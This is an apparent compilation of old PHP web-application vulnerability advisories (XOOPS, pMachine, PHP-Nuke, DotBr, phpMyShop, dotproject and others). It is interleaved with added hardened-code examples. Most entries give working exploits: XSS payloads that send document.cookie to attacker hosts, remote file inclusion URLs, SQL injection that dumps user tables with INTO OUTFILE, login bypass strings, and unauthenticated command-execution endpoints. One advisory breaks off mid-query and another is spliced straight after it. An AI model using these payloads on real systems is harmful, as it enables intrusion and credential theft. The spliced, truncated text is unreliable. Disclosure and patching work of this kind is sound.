BBCode XSS in XOOPS CMS
Information :
Language : PHP
Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked)
Safe Version : 2.0.3
Website : http://www.xoops.org
Problem : BBcode XSS

PHP Code/Location :
This hole can be used in modules :
- Private Messages
- News
- NewBB (forum)

class/module/textsanitizer.php :
---
[...]
function xoopsCodeDecode($text){
    $patterns = array();
    $replacements = array();
    [...]
    $patterns[] = "/\[color=(['\"]?)([^'\"]*)\\1](.*)\[\/color\]/sU";
    $replacements[] = "<span style='color: #\\2;'>\\3</span>";
    $patterns[] = "/\[size=(['\"]?)([^'\"]*)\\1](.*)\[\/size\]/sU";
    $replacements[] = "<span style='font-size: \\2;'>\\3</span>";
    $patterns[] = "/\[font=(['\"]?)([^'\"]*)\\1](.*)\[\/font\]/sU";
    $replacements[] = "<span style='font-family: \\2;'>\\3</span>";
    [...]
    $text = preg_replace($patterns, $replacements, $text);
    [...]
    return $text;
}
[...]
function oopsHtmlSpecialChars($text) {
    $text = htmlspecialchars($text);
    $text = str_replace("'", "&#039;", $text);
    return $text;
}
[...]
---

Exploit :
- [color=FF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]
  [size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size]
  [font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]
- The url() function of the style attribute (CSS) and vbscript are used here to redirect to the url abcdef + the cookie, through the BBcode tags [color], [size] and [font]. Another style function that could be used is expression().

Patch :
Just download the latest version of XOOPS (2.0.3).

[EMAIL PROTECTED]
http://www.phpsecure.info
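Added example (not XOOPS code, and not part of the advisory above): the vulnerable [color]/[size]/[font] conversion from textsanitizer.php reproduced in xoops_style_vulnerable(), next to xoops_style_hardened(), one possible fix in which each tag gets its own value grammar so that a ';' can never smuggle a second CSS property into the generated style attribute. Function names and the allowlist regexes are this example's own assumptions.

```php
<?php
// Added example, not XOOPS code. xoops_style_vulnerable() has the shape of
// the original textsanitizer.php patterns; xoops_style_hardened() accepts a
// value only when it matches a strict per-tag regex (assumed allowlists).

function xoops_style_vulnerable($text) {
    // Same as the original: anything but a quote is accepted as the value.
    $patterns = array(
        "/\[color=(['\"]?)([^'\"]*)\\1](.*)\[\/color\]/sU",
        "/\[size=(['\"]?)([^'\"]*)\\1](.*)\[\/size\]/sU",
        "/\[font=(['\"]?)([^'\"]*)\\1](.*)\[\/font\]/sU",
    );
    $replacements = array(
        "<span style='color: #\\2;'>\\3</span>",
        "<span style='font-size: \\2;'>\\3</span>",
        "<span style='font-family: \\2;'>\\3</span>",
    );
    return preg_replace($patterns, $replacements, $text);
}

function xoops_style_hardened($text) {
    // tag => array(regex the value must match, CSS property, value prefix)
    $rules = array(
        'color' => array('/^[0-9a-fA-F]{3}(?:[0-9a-fA-F]{3})?$/', 'color',       '#'),
        'size'  => array('/^[0-9]{1,2}(?:px|pt|em)?$/',           'font-size',   ''),
        'font'  => array('/^[A-Za-z][A-Za-z0-9 ]{0,30}$/',        'font-family', ''),
    );
    foreach ($rules as $tag => $rule) {
        list($valueRe, $prop, $prefix) = $rule;
        $text = preg_replace_callback(
            "/\[$tag=(['\"]?)([^'\"\]]*)\\1\](.*?)\[\/$tag\]/s",
            function ($m) use ($valueRe, $prop, $prefix) {
                if (!preg_match($valueRe, $m[2])) {
                    return $m[0];   // value rejected: keep the raw BBCode, emit no HTML
                }
                // $m[3] is the body, already HTML-escaped by the caller (as XOOPS does
                // before decoding BBCode), so it is safe outside the attribute.
                return "<span style='" . $prop . ": " . $prefix . $m[2] . ";'>" . $m[3] . "</span>";
            },
            $text
        );
    }
    return $text;
}

// Payload from the advisory: the ';' appends a second CSS property.
$payload = "[color=FF;background:url(vbscript:location.replace(document.cookie))]a[/color]";
echo xoops_style_vulnerable($payload), "\n";               // style='color: #FF;background:url(...)'
echo xoops_style_hardened($payload), "\n";                 // raw BBCode comes back, no <span>
echo xoops_style_hardened("[color=ff0000]ok[/color]"), "\n";  // <span style='color: #ff0000;'>ok</span>
```

The point of the allowlist is that the value is validated as a whole, rather than trying to strip dangerous characters from it: `url(` and `expression(` need only `(`, `)` and `:` to work, none of which the original `[^'"]*` class excludes.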
pMachine (PHP) : Include() Security Hole
Information :
Language : PHP
Version : Free 2.2.1
Website : http://www.pmachine.com
Problem : Include() Security Hole

PHP Code/Location :
This will work if register_globals is ON *OR* OFF.

/pm/lib.inc.php :
---
if (isset($HTTP_COOKIE_VARS)) {
    while(list($var,$val)=each($HTTP_COOKIE_VARS)) { $$var=$val; }
}
if (isset($HTTP_GET_VARS)) {
    while(list($var,$val)=each($HTTP_GET_VARS)) { $$var=$val; }
}
if (isset($HTTP_POST_VARS)) {
    while(list($var,$val)=each($HTTP_POST_VARS)) { $$var=$val; }
}
if (isset($HTTP_SERVER_VARS)) {
    while(list($var,$val)=each($HTTP_SERVER_VARS)) { $$var=$val; }
}
include ("{$pm_path}config$sfx");
if ($debug == 1) error_reporting(E_ALL);
else error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
include ("{$pm_path}db/db.$database$sfx");
include ("{$pm_path}db/db.tables$sfx");
include ("{$pm_path}lib/pmcode.fns$sfx");
include ("{$pm_path}lib/archives.fns$sfx");
include ("{$pm_path}lib/benchmark.class$sfx");
include ("{$pm_path}lib/birthday.fns$sfx");
include ("{$pm_path}lib/calendar.fns$sfx");
include ("{$pm_path}lib/category.fns$sfx");
include ("{$pm_path}lib/censor.fns$sfx");
include ("{$pm_path}lib/comment.fns$sfx");
include ("{$pm_path}lib/deprecated.fns$sfx");
include ("{$pm_path}lib/email.fns$sfx");
include ("{$pm_path}lib/encoded.email$sfx");
include ("{$pm_path}lib/forum.fns$sfx");
include ("{$pm_path}lib/hitcounter.fns$sfx");
include ("{$pm_path}lib/hittracking.fns$sfx");
include ("{$pm_path}lib/ip.fns$sfx");
include ("{$pm_path}lib/linking.fns$sfx");
include ("{$pm_path}lib/mailinglist.fns$sfx");
include ("{$pm_path}lib/member.fns$sfx");
include ("{$pm_path}lib/memberfiles$sfx");
include ("{$pm_path}lib/message.fns$sfx");
include ("{$pm_path}lib/minicalendar.fns$sfx");
include ("{$pm_path}lib/password.fns$sfx");
include ("{$pm_path}lib/pblock.fns$sfx");
include ("{$pm_path}lib/search.fns$sfx");
include ("{$pm_path}lib/shared.fns$sfx");
include ("{$pm_path}lib/stats.fns$sfx");
include ("{$pm_path}lib/tellafriend.fns$sfx");
include ("{$pm_path}lib/timelock.fns$sfx");
include ("{$pm_path}lib/weblog.fns$sfx");
include ("{$pm_path}cp/xmlparser$sfx");
include ("{$pm_path}cp/rss.cp$sfx");
include ("{$pm_path}xmlrpc/ping.fns$sfx");
include ("{$pm_path}xmlrpc/xmlrpc.inc");
---

Exploit :
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=.txt
with : http://[attacker]/config.txt
or
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=/badcode.txt
with : http://[attacker]/config/badcode.txt
etc...

Patch :
A patch can be found on http://www.phpsecure.info.

More Details In French :
http://www.frog-man.org/tutos/pMachineFree2.2.1.txt
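Added example, not pMachine code and not part of the advisory above. It reproduces, on a constructed request, what the `$$var=$val` loops in lib.inc.php do to `$pm_path` regardless of register_globals, then shows the shape of a replacement: the include base is fixed from the file's own location before the first include, and request data is read only by name into the variables it is meant for. `$pm_path`, `$sfx`, `$debug` and `$database` are the names the advisory shows; the allowed parameter table and the driver list are this example's assumptions.

```php
<?php
// Added example, not pMachine code. The first function mirrors the
// vulnerable loop; the second is an assumed replacement.

function pmachine_globals_emulation(array $request, $pm_path = './') {
    // Every request key becomes a variable in this scope, so a client can
    // overwrite $pm_path (and create $sfx) even with register_globals=Off.
    foreach ($request as $var => $val) {
        $$var = $val;
    }
    return $pm_path;          // now whatever the client sent
}

function pmachine_safe_config(array $request) {
    // Non-overridable include base: derived from this file, never from input.
    $pm_path = dirname(__FILE__) . '/';
    $sfx     = '.php';
    // Only named parameters are read, each into its intended variable.
    $allowed = array('debug' => '0', 'database' => 'mysql');   // assumed set
    $params  = array();
    foreach ($allowed as $name => $default) {
        $params[$name] = isset($request[$name]) ? (string) $request[$name] : $default;
    }
    // $database selects a driver file (db/db.$database), so pin it to a known list.
    if (!in_array($params['database'], array('mysql', 'pgsql'), true)) {
        $params['database'] = 'mysql';
    }
    return array('pm_path' => $pm_path, 'sfx' => $sfx, 'params' => $params);
}

// Constructed request reproducing the advisory's URL.
$attacker = array('pm_path' => 'http://[attacker]/', 'sfx' => '.txt', 'database' => '../../x');
echo pmachine_globals_emulation($attacker), "\n";        // http://[attacker]/
$cfg = pmachine_safe_config($attacker);
echo $cfg['pm_path'] . 'config' . $cfg['sfx'], "\n";      // <this directory>/config.php
echo $cfg['params']['database'], "\n";                    // mysql
```

Turning off `allow_url_fopen` (or, on later PHP, `allow_url_include`) stops the remote variant only; a client that can set `$pm_path` to a local directory containing a file it uploaded earlier still gets code execution, which is why the fix is to stop request data from reaching the variable at all.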
Re: PHP-Nuke block-Forums.php subject vulnerabilities
I haven't tested, but I don't think addslashes() is a good solution here. The same javascript can be executed without ' or ", like this :

<form name=a><input type=hidden name=u value=http://www.attacker.com/prova.php></form><script>window.open(document.a.u.value+document.cookie)</script>

What do you think about :

$title2 = htmlspecialchars($title2, ENT_QUOTES);

From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: PHP-Nuke block-Forums.php subject vulnerabilities
Date: 31 Mar 2003 11:15:54 -

The block-Forums.php file has a vuln if an attacker inserts a malformed subject into a topic of Splatt Forum. A type of subject is:

<script>alert('bug');</script>

The 'alt' tag is closed by " and the other text is normal html. This bug is very bad if a subject is:

<script>window.open('www.attacker.com/prova.php?cookie='+document.cookie);</script>

And prova.php registers cookies in a file.

The solution: add under the line
$title2 = stripslashes($title2);
this line:
$title2 = addslashes($title2);
And now, before any " there is a backslash!

--
[EMAIL PROTECTED]
http://www.phpsecure.info
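Added example, not PHP-Nuke code and not part of either message above. It puts the two fixes discussed side by side for a subject rendered inside alt="...": addslashes() and htmlspecialchars() with ENT_QUOTES. The subjects are constructed from the payloads quoted in the thread; the small checker function is this example's own.

```php
<?php
// Added example, not PHP-Nuke code. Renders a subject into an alt attribute
// with each of the two proposed fixes and reports whether the attribute can
// still be broken out of.

function render_with_addslashes($subject) {
    return '<img src="t.gif" alt="' . addslashes($subject) . '">';
}

function render_with_htmlspecialchars($subject) {
    return '<img src="t.gif" alt="' . htmlspecialchars($subject, ENT_QUOTES, 'UTF-8') . '">';
}

// True when the attribute value still contains a raw '"' (which ends the
// attribute; a preceding backslash means nothing to an HTML parser) or a raw '<'.
function attribute_unsafe($html) {
    $prefix = '<img src="t.gif" alt="';
    $value = substr($html, strlen($prefix), -2);   // drop prefix and the closing '">'
    return strpbrk($value, '"<') !== false;
}

// Constructed subjects: the one from the original report, and the quote-free
// variant from the reply prefixed with the attribute-closing '">'.
$subjects = array(
    "<script>alert('bug');</script>",
    '"><form name=a><input type=hidden name=u value=http://www.attacker.com/prova.php></form>'
        . '<script>window.open(document.a.u.value+document.cookie)</script>',
);
foreach ($subjects as $s) {
    $a = render_with_addslashes($s);
    $h = render_with_htmlspecialchars($s);
    printf("addslashes       unsafe=%d  %s\n", attribute_unsafe($a), $a);
    printf("htmlspecialchars unsafe=%d  %s\n\n", attribute_unsafe($h), $h);
}
```

addslashes() produces `\"`, which is an escape for SQL string literals, not for HTML: the browser still sees the `"` and closes the attribute, and `<script>` is left untouched. htmlspecialchars() with ENT_QUOTES turns `"`, `'`, `<`, `>` and `&` into entities, which is the encoding the attribute context actually needs.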
PHP-Nuke 6.0 6.5RC2 SQL Injection Again
Information :
Language : PHP
Website : http://www.phpnuke.org
Version : 6.0 & 6.5 RC2
Modules : Forums, Private_Messages
Problem : SQL Injection

PHP Code/Location :
/modules/Forums/viewtopic.php :
---
$sql = "SELECT forum_type, forum_id, forum_pass, forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = '$forum'";
---
/modules/Forums/viewforum.php :
---
$sql = "SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name, u.uname, u.uid, m.forum_id, m.user_id FROM ${prefix}_forums f, ".$user_prefix."_users u, ${prefix}_forum_mods m WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id = u.uid";
---
/modules/Forums/reply.php :
---
$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = '$forum')";
---
/modules/Forums/newtopic.php :
---
$sql = "SELECT forum_type, forum_pass, forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = '$forum')";
---
/modules/Forums/editpost.php :
---
$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = '$forum'";
---
/modules/Private_Messages/reply.php :
---
if ($reply || $send) {
    if ($uname != "") {
        $res = sql_num_rows(sql_query("select * from ".$user_prefix."_users where uname='$uname'", $dbi), $dbi);
---

Exploits :
- This will save forum information into a txt file :
http://[target]/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt
http://[target]/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=reply&forum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=newtopic&forum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=editpost&forum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt
etc...

- This will save all user information into a txt file :
http://[target]/modules.php?name=Private_Messages&file=reply&send=1&uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt

Patch :
A patch can be found on http://www.phpsecure.info

More Details In French :
http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt

[EMAIL PROTECTED]
PHP-Nuke 6.0 ( 6.5?) : Serious SQL Injection Security Holes
Information :
Language : PHP
Website : http://www.phpnuke.org
Versions : 6.0 (& 6.5?)
Modules : Members_List, Your_Account
Problem : SQL Injection
PHP Configuration : This will work if magic_quotes_gpc=OFF.

PHP Code/Location :
/modules/Members_List/index.php :
---
[...]
$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
$select = "select uid, name, uname, femail, url from ".$user_prefix."_users ";
$where = "where uname != 'Anonymous' ";
if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
    $where .= "AND uname like '".$letter."%' ";
} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
    $where .= "AND uname REGEXP \"^[1-9]\" ";
} else {
    $where .= "";
}
$sort = "order by $sortby";
$limit = " ASC LIMIT ".$min.", ".$max;
$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);
$result = sql_query($select.$where.$sort.$limit, $dbi) or die();
echo "<br>";
if ( $letter != "front" ) {
    echo "<table width=\"100%\" border=\"0\" cellspacing=\"1\"><tr>\n";
    echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";
    echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";
    echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";
    echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";
    $cols = 4;
[...]
---

/modules/Your_Account/index.php :
---
switch($op) {
    [...]
    case "mailpasswd":
        mail_password($uname, $code);
        break;
    case "userinfo":
        userinfo($uname, $bypass, $hid, $url);
        break;
    case "login":
        login($uname, $pass);
        break;
    [...]
    case "saveuser":
        saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
        break;
    [...]
    case "savehome":
        savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson);
        break;
    case "savetheme":
        savetheme($uid, $theme);
        break;
    [...]
    case "savecomm":
        savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
        break;
    [...]
}
---

/modules/Your_Account/index.php :
---
[...]
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
    global $user, $cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        if (!eregi("http://", $url)) {
            $url = "http://$url";
        }
        if ((isset($pass)) && ($pass != $vpass)) {
            echo "<center>"._PASSDIFFERENT."</center>";
        } elseif (($pass != "") && (strlen($pass) < $minpass)) {
            echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> "._CHARLONG."</center>";
        } else {
            if ($bio) {
                filter_text($bio);
                $bio = $EditedMessage;
                $bio = FixQuotes($bio);
            }
            if ($pass != "") {
                cookiedecode($user);
                sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
                $pass = md5($pass);
                sql_query("update ".$user_prefix."_users set name='$realname', email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio', user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ', user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig', user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm', newsletter='$newsletter' where uid='$uid'", $dbi);
                $result = sql_query("select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from ".$user_prefix."_users where uname='$uname' and pass='$pass'", $dbi);
                if(sql_num_rows($result, $dbi)==1) {
                    $userinfo = sql_fetch_array($result, $dbi);
                    docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
                } else {
                    echo "<center>"._SOMETHINGWRONG."</center><br>";
                }
                sql_query("UNLOCK TABLES", $dbi);
            } else {
                sql_query("update ".$user_prefix."_users set name='$realname', email='$email', femail='$femail', url='$url', bio='$bio',
GTcatalog (PHP)
Information :
Version : 0.9
Website : http://www.geektweaked.com
Problems :
- Information Disclosure (Admin Password)
- File Including

PHP Code/Location :
password.inc :
---
<? $globalpw = "[PASSWORD]"; ?>
---
index.php :
---
[...]
switch ($function) {
    case "custom":
        $cc = new Template();
        $cc->set_file("head",$dir_base.$dir_template."header.inc");
        $cc->set_var(array(
            'clientcode' => $cfg_clientcode,
            'title' => $cfg_title." - ".$custom));
        $cc->parse("output","head");
        $cc->p("output");
        include($custom.".custom.inc");
        include ($dir_base.$dir_template."footer.inc");
        break;
[...]
---

Exploits :
- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
  with : http://[attacker]/1.custom.inc

Patch :
A patch can be found on http://www.phpsecure.info (- New Version !! :))

More Details :
In French : http://www.frog-man.org/tutos/GTcatalog.txt

[EMAIL PROTECTED]
Invision Power Board (PHP)
Information :
Website : http://www.invisionboard.com

Version : 1.0.1
Problem : phpinfo()

Version : 1.1.1
Problem : File Including

PHP Code/Location :
v1.0.1 : phpinfo.php :
---
<?php phpinfo(); ?>
---
v1.1.1 : ipchat.php :
---
require $root_path."conf_global.php";
---
(this is a hole if register_globals=ON)

Exploits :
v1.0.1 : http://[target]/phpinfo.php
v1.1.1 : http://[target]/ipchat.php?root_path=http://[attacker]/
with : http://[attacker]/conf_global.php

Patches :
Patches for both versions have been published on http://www.phpsecure.org .

More Details :
In French : http://www.frog-man.org/tutos/InvisionPowerBoard.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FInvisionPowerBoard.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

[EMAIL PROTECTED]
Myguestbook (PHP)
Information :
Version : 3.0
Website : http://www.tefonline.net/
Problems :
- XSS
- admin info recovery
- Access to admin pages

PHP Code/Location :
If pseudo = [SCRIPT], e-mail = [SCRIPT] or message = </textarea>[SCRIPT], [SCRIPT] will be executed on index.php, /admin/user_modif.php, /admin/admin_modif.php and /admin/admin_suppr.php .

/admin/confirm_connect.php :
---
SetCookie("Myguestbook","$name:$password");
---
/admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and /admin/admin_suppr.php :
---
<?
if(!isset($Myguestbook)) header("location:../index.php?MSG=permis");
?>
---

Exploits :
[SCRIPT] :
<script>location='http://[attacker]/file.php?'+document.cookie;</script>

http://[target]/admin/admin_index.php?Myguestbook=1
http://[target]/admin/admin_pass.php?Myguestbook=1
http://[target]/admin/admin_modif.php?Myguestbook=1
http://[target]/admin/admin_suppr.php?Myguestbook=1
http://[target]/admin/user_modif.php?id=[MESSAGEID]

Solution :
A patch can be found on http://www.phpsecure.org.

More Details :
In French : http://www.frog-man.org/tutos/Myguestbook.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyguestbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

[EMAIL PROTECTED]
php-Board (php)
Information :
Website : http://www.hp-planet.de
Version : 1
Problem : Information disclosure

PHP Code/Location :
login.php :
---
function passwd2($user) {
    $password="nicht registriert";
    if (file_exists("user/".$user.".txt")) {
        $fp = fopen("user/".$user.".txt","r");
        $data = fgetcsv($fp,1,"#");
        fclose($fp);
        $password=$data[0];
    }
    return($password);
}
---

Exploit :
http://[target]/user/[NICKNAME].txt

More details :
In French : http://www.frog-man.org/tutos/5holes8.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
http://www.phpsecure.org
DotBr (PHP)
Information :
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Information disclosure
- System command execution

PHP Code/Location :
foo.php3 :
---
<? phpinfo(); ?>
---
config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name

admin/exec.php3 :
---
<html>
<body>
<pre>
<?
if (!isset($sep)) {
    $sep = "_";
}
$cmd=str_replace($sep," ",$cmd);
passthru($cmd,$ret);
echo $ret;
?>
</pre>
</body>
</html>
---
admin/system.php3 :
---
<html>
<body>
<pre>
<?
$cmd = str_replace("_"," ",$cmd);
system($cmd,$result);
echo "\n result == " . $result . "\n";
?>
</pre>
</body>
</html>
---

Exploits :
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]

More Details :
In French : http://www.frog-man.org/tutos/5holes8.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
http://www.phpsecure.org
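Added example, not DotBr code and not part of the advisory above. admin/exec.php3 hands a request parameter straight to passthru() with no authentication. If an administrative command runner has to exist at all, the shape below is the one to aim for: a fixed table of command names mapped to binaries, arguments wrapped with escapeshellarg(), and an explicit privilege check before anything runs. is_admin(), the session flag it reads and the command table are this example's assumptions.

```php
<?php
// Added example, not DotBr code. run_admin_command() replaces
// "passthru($cmd)" with an allowlisted, argument-quoted dispatcher.

function is_admin() {
    // Assumed: an authenticated admin session sets this flag.
    return isset($_SESSION['admin']) && $_SESSION['admin'] === true;
}

function run_admin_command($name, array $args) {
    // The client chooses a key from this table, never a shell string.
    $commands = array(
        'uptime' => array('/usr/bin/uptime', 0),   // binary, maximum argument count
        'df'     => array('/bin/df', 1),
    );
    if (!is_admin()) {
        return array(403, '');
    }
    if (!isset($commands[$name])) {
        return array(400, '');
    }
    list($binary, $maxArgs) = $commands[$name];
    if (count($args) > $maxArgs) {
        return array(400, '');
    }
    $cmd = escapeshellcmd($binary);
    foreach ($args as $a) {
        // Each argument becomes one single-quoted shell word: ';', '|', '`',
        // '$(' and newlines inside it lose their meaning.
        $cmd .= ' ' . escapeshellarg($a);
    }
    exec($cmd, $out, $rc);
    return array($rc === 0 ? 200 : 500, implode("\n", $out));
}

// Constructed request: the advisory's cmd=[COMMAND] idea, now as a quoted argument.
$_SESSION = array('admin' => true);
list($status, $output) = run_admin_command('df', array('/; id'));   // df '/; id' -> no such file
echo $status, "\n", $output, "\n";
list($status, $output) = run_admin_command('id', array());          // not in the table -> 400
echo $status, "\n";
```

The `str_replace("_", " ", $cmd)` in the original is not a filter of any kind; it exists so that a URL without spaces can still carry a full command line, which is the opposite of what an admin endpoint needs.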
D-Forum (PHP)
Information :
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 - 1.11
Problem : Include file

PHP Code/Location :
/includes/header.php3 :
---
<?php
if ($my_header!="") {
    include ($my_header);
} else {
?>
...
---
/includes/footer.php3 :
---
...
if ($my_footer!="") {
    include ($my_footer);
} else {
?>
...
---

Exploits :
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
with http://[attacker]/script.txt

Patch :
A patch can be found on http://www.phpsecure.info .

More details :
(in French) http://www.frog-man.org/tutos/5holes8.txt

frog-m@n
phpMyShop (php)
Information :
Version : 1.00
Website : http://www.pc-encheres.com
Problem : SQL Injection

PHP Code/Location :
compte.php :
---
<?
session_start();
if (isset($achat)) {
    session_register("achat");
} else {
    header("location:index.php");
}
include("design/header.php");
require("config.php");
require("fonction.php");
echo "<td bgcolor=\"$barre1\"><font color=\"$police3\" size=\"$width_police2\"><strong>Identification</strong></font></td>
</tr>
<tr>
<td><br>";
if (isset($valider)) {
    $sql = "SELECT id_cli,login_cli,pass_cli FROM $table_client where login_cli='$identifiant' and pass_cli='$password'";
    $sql = mysql_db_query($base,$sql);
    $test = mysql_num_rows($sql);
    if ($test==0) {
?>
<script language="javascript">
alert("Identifiant ou mot de passe non valide!");
</script>
<?
        echo "<center><strong>Identifiant ou mot de passe non valide!</strong></center><br>";
    } else {
        $id_membre = mysql_result($sql,0,"id_cli");
        session_register("id_membre");
?>
<script language="javascript">
document.location.href="valide.php"
</script>
<?
    }
}
[...]
---

Exploit :
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='

Solution :
A patch has been published on http://www.phpsecure.info .

More details :
In French : http://www.frog-man.org/tutos/phpmyshop.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
myphpPagetool (php)
Information :
Version : 0.4.3-1
Website : http://myphppagetool.sourceforge.net/
Problem : Include file

PHP Code/Location :
In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php and help9.php :
---
<?php
include ($ptinclude . "/pt_config.inc");
[...]
---

Exploit :
http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
with : http://[attacker]/pt_config.inc
(if register_globals=ON)

Solution :
A patch has been published on http://www.phpsecure.info .

More details :
In French : http://www.frog-man.org/tutos/myphpPagetool.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
Re: dotproject Remote Code Execution Vulnerability : Patch
A non-official patch has been created for this hole and is published on http://www.phpsecure.org/index.php?zone=pPatchAsAlpha&dl=us (english version) .

From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: dotproject Remote Code Execution Vulnerability
Date: Wed, 29 Jan 2003 04:02:24 -0800

dotproject Remote Code Execution Vulnerability (By Mindwarper)

Vendor Information:
Homepage : http://www.dotproject.net
Vendor : informed
Mailed advisory : 28/01/03
Vendor Response : None

Affected Versions:
dev20030121

Vulnerability:
dotproject is a PHP+MySQL beta level web based project management and tracking tool that dotmarketing started in Dec. 2000. Inside the directory /modules/ multiple files try to include classdefs/date.php without defining $root_dir first and allow remote attackers to inject their own servers if globals are set on.

Example Code from modules/projects/addedit.php:
---
<?php
##
## Files modules: index page re-usable sub-table
##
require_once( "$root_dir/classdefs/date.php" );
$df = $AppUI->getPref('SHDATEFORMAT');
$tf = $AppUI->getPref('TIMEFORMAT');
---
As you can see nothing happens before the require_once function is called and therefore with globals set on an attacker may include remote files.

Example:
http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker

This works also on:
http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
